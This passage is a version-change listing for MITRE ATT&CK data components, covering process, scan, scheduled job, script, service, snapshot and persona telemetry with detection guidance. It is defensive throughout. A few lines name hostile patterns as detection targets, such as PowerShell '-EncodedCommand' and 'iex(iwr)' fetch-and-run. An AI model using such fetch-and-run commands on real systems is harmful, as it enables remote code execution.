- eBPF/XDP: Monitors low-level system calls related to process modifications.
- OSQuery: The processes table can be queried for unusual modifications.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures lateral movement attempts where adversaries remotely modify a process.
- Syslog/OSSEC: Monitors logs for suspicious modifications. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Termination
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4 | t | The exit or termination of a running process on a system. Th |
| 689) | | is can occur due to normal operations, user-initiated comman |
| | | ds, or malicious actions such as process termination by malw |
| | | are to disable security controls. *Data Collection Measures |
| | | :* - Endpoint Detection and Response (EDR) Tools: - Mon |
| | | itor process termination events. - Windows Event Logs: - |
| | | Event ID 4689 (Process Termination) – Captures when a proce |
| | | ss exits, including process ID and parent process. - Eve |
| | | nt ID 7036 (Service Control Manager) – Monitors system servi |
| | | ce stops. - Sysmon (Windows): - Event ID 5 (Process Term |
| | | ination) – Detects when a process exits, including parent-ch |
| | | ild relationships. - Linux/macOS Monitoring: - AuditD (` |
| | | execve`, `exit_group`, `kill` syscalls) – Captures process t |
| | | ermination via command-line interactions. - eBPF/XDP: Mo |
| | | nitors low-level system calls related to process termination |
| | | . - OSQuery: The processes table can be queried for abno |
| | | rmal exits. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:34.519Z |
| description | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) | The exit or termination of a running process on a system. This can occur due to normal operations, user-initiated commands, or malicious actions such as process termination by malware to disable security controls.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Monitor process termination events.
- Windows Event Logs:
- Event ID 4689 (Process Termination) – Captures when a process exits, including process ID and parent process.
- Event ID 7036 (Service Control Manager) – Monitors system service stops.
- Sysmon (Windows):
- Event ID 5 (Process Termination) – Detects when a process exits, including parent-child relationships.
- Linux/macOS Monitoring:
- AuditD (`execve`, `exit_group`, `kill` syscalls) – Captures process termination via command-line interactions.
- eBPF/XDP: Monitors low-level system calls related to process termination.
- OSQuery: The processes table can be queried for abnormal exits. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Internet Scan: Response Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logged network traffic in response to a scan showing both pr | t | Captured network traffic that provides details about respons |
| otocol header and body values | | es received during an internet scan. This data includes both |
| | | protocol header values (e.g., HTTP status codes, IP headers |
| | | , or DNS response codes) and response body content (e.g., HT |
| | | ML, JSON, or raw data). Examples: - HTTP Scan: A web server |
| | | responds to a probe with an HTTP 200 status code and an HTM |
| | | L body indicating the default page is accessible. - DNS Scan |
| | | : A DNS server replies to a query with a resolved IP address |
| | | for a domain, along with details like Time-To-Live (TTL) an |
| | | d authoritative information. - TCP Banner Grab: A service li |
| | | stening on a port (e.g., SSH or FTP) responds with a banner |
| | | containing service name, version, or other metadata. *Data |
| | | Collection Measures:* - Network Traffic Monitoring: - D |
| | | eploy packet capture tools like Wireshark, tcpdump, or Suric |
| | | ata to log both headers and body content of response traffic |
| | | . - Use network appliances like firewalls, intrusion det |
| | | ection systems (IDS), or intrusion prevention systems (IPS) |
| | | with logging enabled to capture scan responses. - Cloud Logg |
| | | ing Services: - AWS VPC Flow Logs: Capture metadata abou |
| | | t network flows, including source and destination, protocol, |
| | | and response codes. - GCP Packet Mirroring: Use mirrore |
| | | d packets to analyze responses. - Azure NSG Flow Logs: R |
| | | ecord network traffic flow information for analysis. - Speci |
| | | fic Tools: - Zmap or Masscan: Can perform internet-wide |
| | | scans and collect response content for analysis. - Nmap: |
| | | Use custom scripts to capture and log detailed response dat |
| | | a during scans. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:13:36.394Z |
| description | Logged network traffic in response to a scan showing both protocol header and body values | Captured network traffic that provides details about responses received during an internet scan. This data includes both protocol header values (e.g., HTTP status codes, IP headers, or DNS response codes) and response body content (e.g., HTML, JSON, or raw data). Examples:
- HTTP Scan: A web server responds to a probe with an HTTP 200 status code and an HTML body indicating the default page is accessible.
- DNS Scan: A DNS server replies to a query with a resolved IP address for a domain, along with details like Time-To-Live (TTL) and authoritative information.
- TCP Banner Grab: A service listening on a port (e.g., SSH or FTP) responds with a banner containing service name, version, or other metadata.
*Data Collection Measures:*
- Network Traffic Monitoring:
- Deploy packet capture tools like Wireshark, tcpdump, or Suricata to log both headers and body content of response traffic.
- Use network appliances like firewalls, intrusion detection systems (IDS), or intrusion prevention systems (IPS) with logging enabled to capture scan responses.
- Cloud Logging Services:
- AWS VPC Flow Logs: Capture metadata about network flows, including source and destination, protocol, and response codes.
- GCP Packet Mirroring: Use mirrored packets to analyze responses.
- Azure NSG Flow Logs: Record network traffic flow information for analysis.
- Specific Tools:
- Zmap or Masscan: Can perform internet-wide scans and collect response content for analysis.
- Nmap: Use custom scripts to capture and log detailed response data during scans. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Internet Scan: Response Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about an Internet-facing resource gathered f | t | Contextual information about an Internet-facing resource col |
| rom a scan, such as running services or ports | | lected during a scan, including details such as open ports, |
| | | running services, protocols, and versions. This metadata is |
| | | typically derived from interpreting scan results and helps b |
| | | uild a profile of the targeted system. Examples: - Port an |
| | | d Service Details: - Open ports (e.g., 22, 80, 443). |
| | | - Identified services running on those ports (e.g., SSH, HT |
| | | TP, HTTPS). - Service Versions: Detected software version in |
| | | formation (e.g., Apache 2.4.41, OpenSSH 8.2). - Operating Sy |
| | | stem Information: OS fingerprinting data (e.g., Linux Kernel |
| | | 5.4.0). - TLS/SSL Certificate Data: Information about the T |
| | | LS/SSL certificate, such as the expiration date, issuer, and |
| | | cipher suites. *Data Collection Measures:* - Scanning Too |
| | | ls: - Nmap: Collects port, service, and version informat |
| | | ion using commands like nmap -sV <IP>. - Masscan: High-s |
| | | peed scanning tool for discovering open ports and active ser |
| | | vices. - Zmap: Focused on large-scale Internet scanning, |
| | | collecting metadata about discovered services. - Shodan |
| | | API: Retrieves scan metadata for publicly exposed devices a |
| | | nd services. - Network Logs: - Use logs from firewalls, |
| | | intrusion detection systems (IDS), or intrusion prevention s |
| | | ystems (IPS) to gather metadata from scan attempts. Example: |
| | | Zeek or Suricata logs for incoming scan traffic. - OSINT Pl |
| | | atforms: Platforms like Censys, GreyNoise, or Shodan provide |
| | | aggregated metadata about Internet-facing resources. - Clou |
| | | d Metadata Services: AWS Security Hub, Azure Monitor, or GCP |
| | | Security Command Center can collect and centralize scan-rel |
| | | ated metadata for Internet-facing resources in cloud environ |
| | | ments. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:13:39.602Z |
| description | Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports | Contextual information about an Internet-facing resource collected during a scan, including details such as open ports, running services, protocols, and versions. This metadata is typically derived from interpreting scan results and helps build a profile of the targeted system. Examples:
- Port and Service Details:
- Open ports (e.g., 22, 80, 443).
- Identified services running on those ports (e.g., SSH, HTTP, HTTPS).
- Service Versions: Detected software version information (e.g., Apache 2.4.41, OpenSSH 8.2).
- Operating System Information: OS fingerprinting data (e.g., Linux Kernel 5.4.0).
- TLS/SSL Certificate Data: Information about the TLS/SSL certificate, such as the expiration date, issuer, and cipher suites.
*Data Collection Measures:*
- Scanning Tools:
- Nmap: Collects port, service, and version information using commands like nmap -sV .
- Masscan: High-speed scanning tool for discovering open ports and active services.
- Zmap: Focused on large-scale Internet scanning, collecting metadata about discovered services.
- Shodan API: Retrieves scan metadata for publicly exposed devices and services.
- Network Logs:
- Use logs from firewalls, intrusion detection systems (IDS), or intrusion prevention systems (IPS) to gather metadata from scan attempts. Example: Zeek or Suricata logs for incoming scan traffic.
- OSINT Platforms: Platforms like Censys, GreyNoise, or Shodan provide aggregated metadata about Internet-facing resources.
- Cloud Metadata Services: AWS Security Hub, Azure Monitor, or GCP Security Command Center can collect and centralize scan-related metadata for Internet-facing resources in cloud environments. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new scheduled job (ex: Windows EID | t | The establishment of a task or job that will execute at a pr |
| 4698 or /var/log cron logs) | | edefined time or based on specific triggers. *Data Collecti |
| | | on Measures: * - Windows Event Logs: - Event ID 4698 (S |
| | | cheduled Task Created) – Detects the creation of new schedul |
| | | ed tasks. - Event ID 4702 (Scheduled Task Updated) – Ide |
| | | ntifies modifications to existing scheduled jobs. - Even |
| | | t ID 106 (TaskScheduler Operational Log) – Provides details |
| | | about scheduled task execution. - Sysmon (Windows): - Ev |
| | | ent ID 1 (Process Creation) – Detects the execution of suspi |
| | | cious tasks started by `schtasks.exe`, `at.exe`, or `taskeng |
| | | .exe`. - Linux/macOS Monitoring: - AuditD: Monitor modif |
| | | ications to `/etc/cron*`, `/var/spool/cron/`, and `crontab` |
| | | files. - Syslog: Capture cron job execution logs from `/ |
| | | var/log/cron`. - OSQuery: Query the `crontab` and `launc |
| | | hd` tables for scheduled job configurations. - Endpoint Dete |
| | | ction and Response (EDR) Tools: - Track scheduled task c |
| | | reation and modification events. - SIEM & XDR Detection Rule |
| | | s: - Monitor for scheduled jobs created by unusual users |
| | | . - Detect tasks executing scripts from non-standard dir |
| | | ectories. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:43.635Z |
| description | Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs) | The establishment of a task or job that will execute at a predefined time or based on specific triggers.
*Data Collection Measures: *
- Windows Event Logs:
- Event ID 4698 (Scheduled Task Created) – Detects the creation of new scheduled tasks.
- Event ID 4702 (Scheduled Task Updated) – Identifies modifications to existing scheduled jobs.
- Event ID 106 (TaskScheduler Operational Log) – Provides details about scheduled task execution.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Detects the execution of suspicious tasks started by `schtasks.exe`, `at.exe`, or `taskeng.exe`.
- Linux/macOS Monitoring:
- AuditD: Monitor modifications to `/etc/cron*`, `/var/spool/cron/`, and `crontab` files.
- Syslog: Capture cron job execution logs from `/var/log/cron`.
- OSQuery: Query the `crontab` and `launchd` tables for scheduled job configurations.
- Endpoint Detection and Response (EDR) Tools:
- Track scheduled task creation and modification events.
- SIEM & XDR Detection Rules:
- Monitor for scheduled jobs created by unusual users.
- Detect tasks executing scripts from non-standard directories. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Script: Script Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The execution of a text file that contains code via the inte | t | The execution of a text file that contains code via the inte |
| rpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) | | rpreter. *Data Collection Measures:* - Windows Event Logs: |
| | | - Event ID 4104 (PowerShell Script Block Logging) – Cap |
| | | tures full command-line execution of PowerShell scripts. |
| | | - Event ID 4688 (Process Creation) – Detects script executi |
| | | on by tracking process launches (`powershell.exe`, `wscript. |
| | | exe`, `cscript.exe`). - Event ID 5861 (Script Execution) |
| | | – Captures script execution via Windows Defender AMSI loggi |
| | | ng. - Sysmon (Windows): - Event ID 1 (Process Creation) |
| | | – Monitors script execution initiated by scripting engines. |
| | | - Event ID 11 (File Creation) – Detects new script files |
| | | written to disk before execution. - Endpoint Detection and |
| | | Response (EDR) Tools: - Track script execution behavior, |
| | | detect obfuscated commands, and prevent malicious scripts. |
| | | - PowerShell Logging: - Enable Module Logging: Logs all |
| | | loaded modules and cmdlets. - Enable Script Block Loggin |
| | | g: Captures complete PowerShell script execution history. - |
| | | SIEM Detection Rules: - Detect script execution with obf |
| | | uscated, encoded, or remote URLs. - Alert on script exec |
| | | utions using `-EncodedCommand` or `iex(iwr)`. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:16:55.269Z | 2025-04-18T15:12:46.164Z |
| description | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) | The execution of a text file that contains code via the interpreter.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
- Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (`powershell.exe`, `wscript.exe`, `cscript.exe`).
- Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
- Event ID 11 (File Creation) – Detects new script files written to disk before execution.
- Endpoint Detection and Response (EDR) Tools:
- Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
- PowerShell Logging:
- Enable Module Logging: Logs all loaded modules and cmdlets.
- Enable Script Block Logging: Captures complete PowerShell script execution history.
- SIEM Detection Rules:
- Detect script execution with obfuscated, encoded, or remote URLs.
- Alert on script executions using `-EncodedCommand` or `iex(iwr)`. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new service/daemon (ex: Windows EI | t | The registration of a new service or daemon on an operating |
| D 4697 or /var/log daemon logs) | | system. *Data Collection Measures:* - Windows Event Logs |
| | | - Event ID 4697 - Captures the creation of a new Windows |
| | | service. - Event ID 7045 - Captures services installed b |
| | | y administrators or adversaries. - Event ID 7034 - Could |
| | | indicate malicious service modification or exploitation. - |
| | | Sysmon Logs - Sysmon Event ID 1 - Process Creation (capt |
| | | ures service executables). - Sysmon Event ID 4 - Service |
| | | state changes (detects service installation). - Sysmon |
| | | Event ID 13 - Registry modifications (captures service persi |
| | | stence changes). - PowerShell Logging - Monitor `New-Ser |
| | | vice` and `Set-Service` PowerShell cmdlets in Event ID 4104 |
| | | (Script Block Logging). - Linux/macOS Collection Methods |
| | | - AuditD & Syslog Daemon Logs (`/var/log/syslog`, `/var/log |
| | | /messages`, `/var/log/daemon.log`) - AuditD Rules: |
| | | - `auditctl -w /etc/systemd/system -p wa -k service_creat |
| | | ion` - Detects changes to `systemd` service configur |
| | | ations. - Systemd Journals (`journalctl -u <service_name>`) |
| | | - Captures newly created systemd services. - LaunchDaemo |
| | | ns & LaunchAgents (macOS) - Monitor `/Library/LaunchDaem |
| | | ons/` and `/Library/LaunchAgents/` for new plist files. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:54.408Z |
| description | Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs) | The registration of a new service or daemon on an operating system.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4697 - Captures the creation of a new Windows service.
- Event ID 7045 - Captures services installed by administrators or adversaries.
- Event ID 7034 - Could indicate malicious service modification or exploitation.
- Sysmon Logs
- Sysmon Event ID 1 - Process Creation (captures service executables).
- Sysmon Event ID 4 - Service state changes (detects service installation).
- Sysmon Event ID 13 - Registry modifications (captures service persistence changes).
- PowerShell Logging
- Monitor `New-Service` and `Set-Service` PowerShell cmdlets in Event ID 4104 (Script Block Logging).
- Linux/macOS Collection Methods
- AuditD & Syslog Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`)
- AuditD Rules:
- `auditctl -w /etc/systemd/system -p wa -k service_creation`
- Detects changes to `systemd` service configurations.
- Systemd Journals (`journalctl -u `)
- Captures newly created systemd services.
- LaunchDaemons & LaunchAgents (macOS)
- Monitor `/Library/LaunchDaemons/` and `/Library/LaunchAgents/` for new plist files. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a service/daemon, such as changes to name, d | t | Changes made to an existing service or daemon, such as modif |
| escription, and/or start type (ex: Windows EID 7040 or /var/ | | ying the service name, start type, execution parameters, or |
| log daemon logs) | | security configurations. *Data Collection Measures: * - Wi |
| | | ndows Event Logs - Event ID 7040 - Detects modifications |
| | | to the startup behavior of a service. - Event ID 7045 - |
| | | Can capture changes made to existing services. - Event |
| | | ID 7036 - Tracks when services start or stop, potentially in |
| | | dicating malicious tampering. - Event ID 4697 - Can dete |
| | | ct when an adversary reinstalls a service with different par |
| | | ameters. - Sysmon Logs - Sysmon Event ID 13 - Detects ch |
| | | anges to service configurations in the Windows Registry (e.g |
| | | ., `HKLM\SYSTEM\CurrentControlSet\Services\`). - Sysmon |
| | | Event ID 1 - Can track execution of `sc.exe` or `PowerShell |
| | | Set-Service`. - PowerShell Logging - Event ID 4104 (Scri |
| | | pt Block Logging) - Captures execution of commands like `Set |
| | | -Service`, `New-Service`, or `sc config`. - Command-Line |
| | | Logging (Event ID 4688) - Tracks usage of service modificat |
| | | ion commands: - `sc config <service_name> start= aut |
| | | o` - `sc qc <service_name>` - Linux/macOS Collec |
| | | tion Methods - Systemd Journals (`journalctl -u <service |
| | | _name>`) Tracks modifications to systemd service configurati |
| | | ons. - Daemon Logs (`/var/log/syslog`, `/var/log/message |
| | | s`, `/var/log/daemon.log`) Captures changes to service state |
| | | and execution parameters. - AuditD Rules for Service Mo |
| | | dification - Monitor modifications to `/etc/systemd |
| | | /system/` for new or altered service unit files: `auditctl - |
| | | w /etc/systemd/system/ -p wa -k service_modification` |
| | | - Track execution of `systemctl` or `service` commands: `a |
| | | uditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl |
| | | -F key=service_mod` - OSQuery for Linux/macOS Monitorin |
| | | g - Query modified services using OSQuery’s `process |
| | | es` or `system_info` tables: `SELECT * FROM systemd_units WH |
| | | ERE state != 'running';` - macOS Launch Daemon/Agent Mod |
| | | ification - Monitor for changes in: - `/ |
| | | Library/LaunchDaemons/` - `/Library/LaunchAgents |
| | | /` - Track modifications to `.plist` files indicatin |
| | | g persistence attempts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:57.700Z |
| description | Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs) | Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.
*Data Collection Measures: *
- Windows Event Logs
- Event ID 7040 - Detects modifications to the startup behavior of a service.
- Event ID 7045 - Can capture changes made to existing services.
- Event ID 7036 - Tracks when services start or stop, potentially indicating malicious tampering.
- Event ID 4697 - Can detect when an adversary reinstalls a service with different parameters.
- Sysmon Logs
- Sysmon Event ID 13 - Detects changes to service configurations in the Windows Registry (e.g., `HKLM\SYSTEM\CurrentControlSet\Services\`).
- Sysmon Event ID 1 - Can track execution of `sc.exe` or `PowerShell Set-Service`.
- PowerShell Logging
- Event ID 4104 (Script Block Logging) - Captures execution of commands like `Set-Service`, `New-Service`, or `sc config`.
- Command-Line Logging (Event ID 4688) - Tracks usage of service modification commands:
- `sc config start= auto`
- `sc qc `
- Linux/macOS Collection Methods
- Systemd Journals (`journalctl -u `) Tracks modifications to systemd service configurations.
- Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`) Captures changes to service state and execution parameters.
- AuditD Rules for Service Modification
- Monitor modifications to `/etc/systemd/system/` for new or altered service unit files: `auditctl -w /etc/systemd/system/ -p wa -k service_modification`
- Track execution of `systemctl` or `service` commands: `auditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl -F key=service_mod`
- OSQuery for Linux/macOS Monitoring
- Query modified services using OSQuery’s `processes` or `system_info` tables: `SELECT * FROM systemd_units WHERE state != 'running';`
- macOS Launch Daemon/Agent Modification
- Monitor for changes in:
- `/Library/LaunchDaemons/`
- `/Library/LaunchAgents/`
- Track modifications to `.plist` files indicating persistence attempts. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new snapshot (ex: AWS create-snaps | t | The process of taking a point-in-time copy of a cloud storag |
| hot) | | e volume (files, settings, configurations, etc.), virtual ma |
| | | chine (VM), or database that can be created and deployed in |
| | | cloud environments. *Data Collection Measures:* - Cloud Pl |
| | | atform Logs (IaaS) - AWS CloudTrail Logs: Monitor API ca |
| | | lls related to snapshot creation (`CreateSnapshot`). - A |
| | | zure Monitor Logs: Track snapshot creation (`Microsoft.Compu |
| | | te/snapshots/write`). - Google Cloud Logging: Detect `co |
| | | mpute.disks.createSnapshot`. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:08.504Z |
| description | Initial construction of a new snapshot (ex: AWS create-snapshot) | The process of taking a point-in-time copy of a cloud storage volume (files, settings, configurations, etc.), virtual machine (VM), or database that can be created and deployed in cloud environments.
*Data Collection Measures:*
- Cloud Platform Logs (IaaS)
- AWS CloudTrail Logs: Monitor API calls related to snapshot creation (`CreateSnapshot`).
- Azure Monitor Logs: Track snapshot creation (`Microsoft.Compute/snapshots/write`).
- Google Cloud Logging: Detect `compute.disks.createSnapshot`. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of a snapshot (ex: AWS delete-snapshot) | t | The removal of a point-in-time backup of a cloud storage vol |
| | | ume, virtual machine (VM), or database. *Data Collection Me |
| | | asures:* - AWS CloudTrail - Logs `DeleteSnapshot` API c |
| | | alls in EC2, RDS, and EBS services. - Azure Monitor Logs |
| | | - Tracks snapshot deletions via `Microsoft.Compute/snapshot |
| | | s/delete` API calls. - Google Cloud Logging - Detects sn |
| | | apshot removal through `compute.disks.deleteSnapshot` events |
| | | . |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:05.200Z |
| description | Removal of a snapshot (ex: AWS delete-snapshot) | The removal of a point-in-time backup of a cloud storage volume, virtual machine (VM), or database.
*Data Collection Measures:*
- AWS CloudTrail
- Logs `DeleteSnapshot` API calls in EC2, RDS, and EBS services.
- Azure Monitor Logs
- Tracks snapshot deletions via `Microsoft.Compute/snapshots/delete` API calls.
- Google Cloud Logging
- Detects snapshot removal through `compute.disks.deleteSnapshot` events. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of snapshops within a cloud environment (e | t | The process of listing or retrieving metadata about existing |
| x: AWS describe-snapshots) | | snapshots in a cloud environment. *Data Collection Measure |
| | | s:* - AWS CloudTrail - Logs API calls such as `Describe |
| | | Snapshots`, `ListSnapshots`, and `GetSnapshotAttributes`. - |
| | | Azure Monitor Logs - Tracks snapshot enumeration via `Mi |
| | | crosoft.Compute/snapshots/read`. - Google Cloud Logging |
| | | - Detects snapshot listing through `compute.disks.listSnapsh |
| | | ots`. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:18.124Z |
| description | An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots) | The process of listing or retrieving metadata about existing snapshots in a cloud environment.
*Data Collection Measures:*
- AWS CloudTrail
- Logs API calls such as `DescribeSnapshots`, `ListSnapshots`, and `GetSnapshotAttributes`.
- Azure Monitor Logs
- Tracks snapshot enumeration via `Microsoft.Compute/snapshots/read`.
- Google Cloud Logging
- Detects snapshot listing through `compute.disks.listSnapshots`.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a snapshop, such as metadata and control dat | t | Changes made to a cloud snapshot's metadata, attributes, or |
| a (ex: AWS modify-snapshot-attribute) | | control settings. These modifications may involve adjusting |
| | | access permissions, changing retention policies, or altering |
| | | encryption settings. *Data Collection Measures:* - AWS C |
| | | loudTrail - Tracks API calls such as `ModifySnapshotAttr |
| | | ibute`, `ResetSnapshotAttribute`, and `ModifySnapshotTier`. |
| | | - Azure Monitor Logs - Logs changes via `Microsoft.Compu |
| | | te/snapshots/write`. - Google Cloud Logging - Captures m |
| | | odifications through `compute.snapshots.setIamPolicy` and `c |
| | | ompute.snapshots.patch`. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:11.682Z |
| description | Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute) | Changes made to a cloud snapshot's metadata, attributes, or control settings. These modifications may involve adjusting access permissions, changing retention policies, or altering encryption settings.
*Data Collection Measures:*
- AWS CloudTrail
- Tracks API calls such as `ModifySnapshotAttribute`, `ResetSnapshotAttribute`, and `ModifySnapshotTier`.
- Azure Monitor Logs
- Logs changes via `Microsoft.Compute/snapshots/write`.
- Google Cloud Logging
- Captures modifications through `compute.snapshots.setIamPolicy` and `compute.snapshots.patch`. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Persona: Social Media
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Established, compromised, or otherwise acquired social media | t | Established, compromised, or otherwise acquired by adversari |
| personas | | es to conduct reconnaissance, influence operations, social e |
| | | ngineering, or other cyber threats. *Data Collection Measur |
| | | es:* - API Monitoring - Social media APIs (e.g., |
| | | Twitter API, Facebook Graph API) can extract behavioral patt |
| | | erns of accounts. - Web Scraping - Extracts public profi |
| | | le data, friend lists, or interactions to identify impersona |
| | | tion attempts. - Threat Intelligence Feeds - External |
| | | feeds track malicious personas linked to disinformation camp |
| | | aigns or phishing. - OSINT Tools - Maltego, SpiderFoot, |
| | | and OpenCTI can map social media persona relationships. - En |
| | | dpoint Detection - EDR logs user behavior and alerts |
| | | on suspicious social media interactions. - SIEM Logging |
| | | - Detects access to known phishing pages or social media ab |
| | | use via proxy logs. - Dark Web Monitoring - Ident |
| | | ifies compromised social media credentials being sold. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:16:50.453Z |
| description | Established, compromised, or otherwise acquired social media personas | Established, compromised, or otherwise acquired by adversaries to conduct reconnaissance, influence operations, social engineering, or other cyber threats.
*Data Collection Measures:*
- API Monitoring
- Social media APIs (e.g., Twitter API, Facebook Graph API) can extract behavioral patterns of accounts.
- Web Scraping
- Extracts public profile data, friend lists, or interactions to identify impersonation attempts.
- Threat Intelligence Feeds
- External feeds track malicious personas linked to disinformation campaigns or phishing.
- OSINT Tools
- Maltego, SpiderFoot, and OpenCTI can map social media persona relationships.
- Endpoint Detection
- EDR logs user behavior and alerts on suspicious social media interactions.
- SIEM Logging
- Detects access to known phishing pages or social media abuse via proxy logs.
- Dark Web Monitoring
- Identifies compromised social media credentials being sold. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Authentication
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | An attempt by a user to gain access to a network or computin | t | An attempt (successful and failed login attempts) by a user, |
